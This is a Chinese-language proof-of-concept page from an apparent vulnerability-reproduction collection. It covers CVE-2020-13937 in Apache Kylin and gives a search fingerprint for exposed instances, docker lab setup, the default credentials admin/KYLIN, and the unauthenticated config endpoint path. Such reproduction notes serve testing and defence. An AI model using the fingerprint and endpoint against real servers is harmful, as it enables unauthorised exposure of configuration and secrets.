admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 12:25:11 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/中间件漏洞/Apache Kylin config 未授权配置泄露 CVE-2020-13937.md

41 lines
713 B
Markdown
Raw Normal View History

update
2024-11-06 14:10:36 +08:00
# Apache Kylin config 未授权配置泄露 CVE-2020-13937
## 漏洞描述
Apache Kylin有一个restful api会在没有任何认证的情况下暴露配置信息
## 网络测绘
```
app="APACHE-kylin"
```
## 环境搭建
```
docker pull apachekylin/apache-kylin-standalone:3.0.1
docker run -d \
-m 8G \
-p 7070:7070 \
-p 8088:8088 \
-p 50070:50070 \
-p 8032:8032 \
-p 8042:8042 \
-p 16010:16010 \
apachekylin/apache-kylin-standalone:3.0.1
```
打开后使用默认账号密码admin/KYLIN登录出现初始界面即为成功
![image-20220525161044773](images/202205251610838.png)
## 漏洞复现
漏洞验证POC
```
/kylin/api/admin/config
```
![image-20220525161140820](images/202205251611885.png)
Reference in New Issue Copy Permalink